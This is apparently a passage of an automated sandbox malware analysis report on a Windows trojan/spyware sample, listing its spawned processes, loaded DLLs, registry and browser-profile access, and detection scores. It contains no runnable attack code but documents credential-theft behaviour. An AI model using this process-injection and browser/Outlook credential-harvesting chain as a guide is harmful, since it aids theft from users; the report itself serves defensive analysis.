Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F94420	7_2_04F94420
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FB0591	7_2_04FB0591
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EF0535	7_2_04EF0535
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F0C6E0	7_2_04F0C6E0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EEC7C0	7_2_04EEC7C0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EF0770	7_2_04EF0770
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F14750	7_2_04F14750
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F82000	7_2_04F82000
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FA81CC	7_2_04FA81CC
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FB01AA	7_2_04FB01AA
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FA41A2	7_2_04FA41A2
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F78158	7_2_04F78158
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F8A118	7_2_04F8A118
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EE0100	7_2_04EE0100
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F702C0	7_2_04F702C0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F90274	7_2_04F90274
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FB03E6	7_2_04FB03E6
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EFE3F0	7_2_04EFE3F0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FAA352	7_2_04FAA352
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EE0CF2	7_2_04EE0CF2
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F90CB5	7_2_04F90CB5
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EF0C00	7_2_04EF0C00
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EEADE0	7_2_04EEADE0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F08DBF	7_2_04F08DBF
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F8CD1F	7_2_04F8CD1F
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EFAD00	7_2_04EFAD00
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FAEEDB	7_2_04FAEEDB
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F02E90	7_2_04F02E90
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FACE93	7_2_04FACE93
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EF0E59	7_2_04EF0E59
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FAEE26	7_2_04FAEE26
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EFCFE0	7_2_04EFCFE0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EE2FC8	7_2_04EE2FC8
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F6EFA0	7_2_04F6EFA0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F64F40	7_2_04F64F40
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F10F30	7_2_04F10F30
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F92F30	7_2_04F92F30
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F32F28	7_2_04F32F28
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F1E8F0	7_2_04F1E8F0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04ED68B8	7_2_04ED68B8
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EF2840	7_2_04EF2840
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EFA840	7_2_04EFA840
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EF29A0	7_2_04EF29A0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FBA9A6	7_2_04FBA9A6
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F06962	7_2_04F06962
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EEEA80	7_2_04EEEA80
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FA6BD7	7_2_04FA6BD7
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FAAB40	7_2_04FAAB40
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EE1460	7_2_04EE1460
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FAF43F	7_2_04FAF43F
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FB95C3	7_2_04FB95C3
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F8D5B0	7_2_04F8D5B0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FA7571	7_2_04FA7571
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FA16CC	7_2_04FA16CC
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F35630	7_2_04F35630
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FAF7B0	7_2_04FAF7B0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FA70E9	7_2_04FA70E9
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FAF0E0	7_2_04FAF0E0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EF70C0	7_2_04EF70C0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F9F0CC	7_2_04F9F0CC
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EFB1B0	7_2_04EFB1B0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FBB16B	7_2_04FBB16B
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F2516C	7_2_04F2516C
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EDF172	7_2_04EDF172
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F912ED	7_2_04F912ED
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F0B2C0	7_2_04F0B2C0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EF52A0	7_2_04EF52A0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F3739A	7_2_04F3739A
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EDD34C	7_2_04EDD34C
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FA132D	7_2_04FA132D
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FAFCF2	7_2_04FAFCF2
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F69C32	7_2_04F69C32
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F0FDC0	7_2_04F0FDC0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FA7D73	7_2_04FA7D73
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FA1D5A	7_2_04FA1D5A
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EF3D40	7_2_04EF3D40
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EF9EB0	7_2_04EF9EB0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EB3FD2	7_2_04EB3FD2
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EB3FD5	7_2_04EB3FD5
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FAFFB1	7_2_04FAFFB1
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EF1F92	7_2_04EF1F92
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FAFF09	7_2_04FAFF09
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EF38E0	7_2_04EF38E0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F5D800	7_2_04F5D800
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F0B950	7_2_04F0B950
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04EF9950	7_2_04EF9950
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F85910	7_2_04F85910
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F9DAC6	7_2_04F9DAC6
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F35AA0	7_2_04F35AA0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F8DAAC	7_2_04F8DAAC
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F91AA3	7_2_04F91AA3
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F63A6C	7_2_04F63A6C
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FAFA49	7_2_04FAFA49
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FA7A46	7_2_04FA7A46
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F65BF0	7_2_04F65BF0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F2DBF9	7_2_04F2DBF9
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04F0FB80	7_2_04F0FB80
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04FAFB76	7_2_04FAFB76
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C91BD0	7_2_00C91BD0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C8CA00	7_2_00C8CA00
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C8AC00	7_2_00C8AC00
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C8CC20	7_2_00C8CC20
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C8AD45	7_2_00C8AD45
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C8AD50	7_2_00C8AD50
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C95280	7_2_00C95280
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C93480	7_2_00C93480
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00C9347B	7_2_00C9347B
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_00CAB9C0	7_2_00CAB9C0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04CFE66C	7_2_04CFE66C
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04CFD738	7_2_04CFD738
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04CFE1B8	7_2_04CFE1B8
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 7_2_04CFE2D4	7_2_04CFE2D4

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00AFB970 appears 278 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00B8F290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00B57E54 appears 101 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00B45130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00B7EA12 appears 86 times
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: String function: 04F37E54 appears 110 times
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: String function: 04F5EA12 appears 86 times
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: String function: 04F25130 appears 58 times
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: String function: 04EDB970 appears 280 times
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: String function: 04F6F290 appears 105 times
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: String function: 00784963 appears 31 times
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: String function: 00769CB3 appears 31 times
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: String function: 00780A30 appears 46 times
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: String function: 0077F9F2 appears 40 times

Source: FG5wHs4fVX.exe, 00000000.00000003.1412736394.0000000003E5D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs FG5wHs4fVX.exe
Source: FG5wHs4fVX.exe, 00000000.00000003.1413055333.0000000003CB3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs FG5wHs4fVX.exe

Source: FG5wHs4fVX.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@6/3

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007D37B5 GetLastError,FormatMessageW,

0_2_007D37B5

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007C10BF AdjustTokenPrivileges,CloseHandle,		0_2_007C10BF
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_007C16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_007C16C3

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007D51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_007D51CD

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007EA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_007EA67C

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007D648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_007D648E

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007642A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_007642A2

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

File created: C:\Users\user\AppData\Local\Temp\aut2815.tmp

Jump to behavior

Source: FG5wHs4fVX.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: mtstocom.exe, 00000007.00000003.2219067772.00000000032E2000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2633609388.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2633609388.00000000032E2000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2633609388.000000000330F000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000003.2217863288.00000000032C1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FG5wHs4fVX.exe	ReversingLabs: Detection: 76%
Source: FG5wHs4fVX.exe	Virustotal: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\FG5wHs4fVX.exe "C:\Users\user\Desktop\FG5wHs4fVX.exe"
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\FG5wHs4fVX.exe"
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	Process created: C:\Windows\SysWOW64\mtstocom.exe "C:\Windows\SysWOW64\mtstocom.exe"
Source: C:\Windows\SysWOW64\mtstocom.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\FG5wHs4fVX.exe"	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	Process created: C:\Windows\SysWOW64\mtstocom.exe "C:\Windows\SysWOW64\mtstocom.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mtstocom.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mtstocom.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mtstocom.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: FG5wHs4fVX.exe

Static file information: File size 1267712 > 1048576

Source: FG5wHs4fVX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: FG5wHs4fVX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: FG5wHs4fVX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: FG5wHs4fVX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: FG5wHs4fVX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: FG5wHs4fVX.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: FG5wHs4fVX.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mtstocom.pdb source: svchost.exe, 00000002.00000003.1996128932.000000000085B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1996032422.000000000081A000.00000004.00000020.00020000.00000000.sdmp, iiYhUrEPyAr.exe, 00000006.00000002.2633604205.0000000000B97000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iiYhUrEPyAr.exe, 00000006.00000002.2634118255.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp, iiYhUrEPyAr.exe, 00000008.00000002.2634982649.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: FG5wHs4fVX.exe, 00000000.00000003.1412579286.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, FG5wHs4fVX.exe, 00000000.00000003.1412200937.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1931450743.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2028697509.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2028697509.0000000000C6E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1934158532.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000003.2028664135.0000000004B4B000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2635068902.000000000504E000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2635068902.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000003.2030969747.0000000004CFB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: FG5wHs4fVX.exe, 00000000.00000003.1412579286.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, FG5wHs4fVX.exe, 00000000.00000003.1412200937.0000000003D30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1931450743.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2028697509.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2028697509.0000000000C6E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1934158532.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, mtstocom.exe, 00000007.00000003.2028664135.0000000004B4B000.00000004.00000020.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2635068902.000000000504E000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2635068902.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, mtstocom.exe, 00000007.00000003.2030969747.0000000004CFB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mtstocom.pdbGCTL source: svchost.exe, 00000002.00000003.1996128932.000000000085B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1996032422.000000000081A000.00000004.00000020.00020000.00000000.sdmp, iiYhUrEPyAr.exe, 00000006.00000002.2633604205.0000000000B97000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: mtstocom.exe, 00000007.00000002.2635729074.00000000054DC000.00000004.10000000.00040000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2633609388.0000000003266000.00000004.00000020.00020000.00000000.sdmp, iiYhUrEPyAr.exe, 00000008.00000000.2101262776.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2335691103.000000002D73C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: mtstocom.exe, 00000007.00000002.2635729074.00000000054DC000.00000004.10000000.00040000.00000000.sdmp, mtstocom.exe, 00000007.00000002.2633609388.0000000003266000.00000004.00000020.00020000.00000000.sdmp, iiYhUrEPyAr.exe, 00000008.00000000.2101262776.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2335691103.000000002D73C000.00000004.80000000.00040000.00000000.sdmp

Source: FG5wHs4fVX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: FG5wHs4fVX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: FG5wHs4fVX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: FG5wHs4fVX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: FG5wHs4fVX.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe

Code function: 0_2_007642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007642DE

Source: C:\Users\user\Desktop\FG5wHs4fVX.exe	Code function: 0_2_00780A76 push ecx; ret	0_2_00780A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0033A833 push ebp; iretd	2_2_0033A851
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003380A6 push ds; retf	2_2_003380A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00334093 pushfd ; ret	2_2_00334099
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00338168 push ecx; iretd	2_2_00338169
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0033A981 push eax; iretd	2_2_0033A9A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00337A5E push esi; retf 4925h	2_2_00337A91
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0033928F push DF2C003Dh; retf	2_2_00339295
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00321AFB push ebp; retf	2_2_00321B02
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00331C94 push ebx; ret	2_2_00331C95
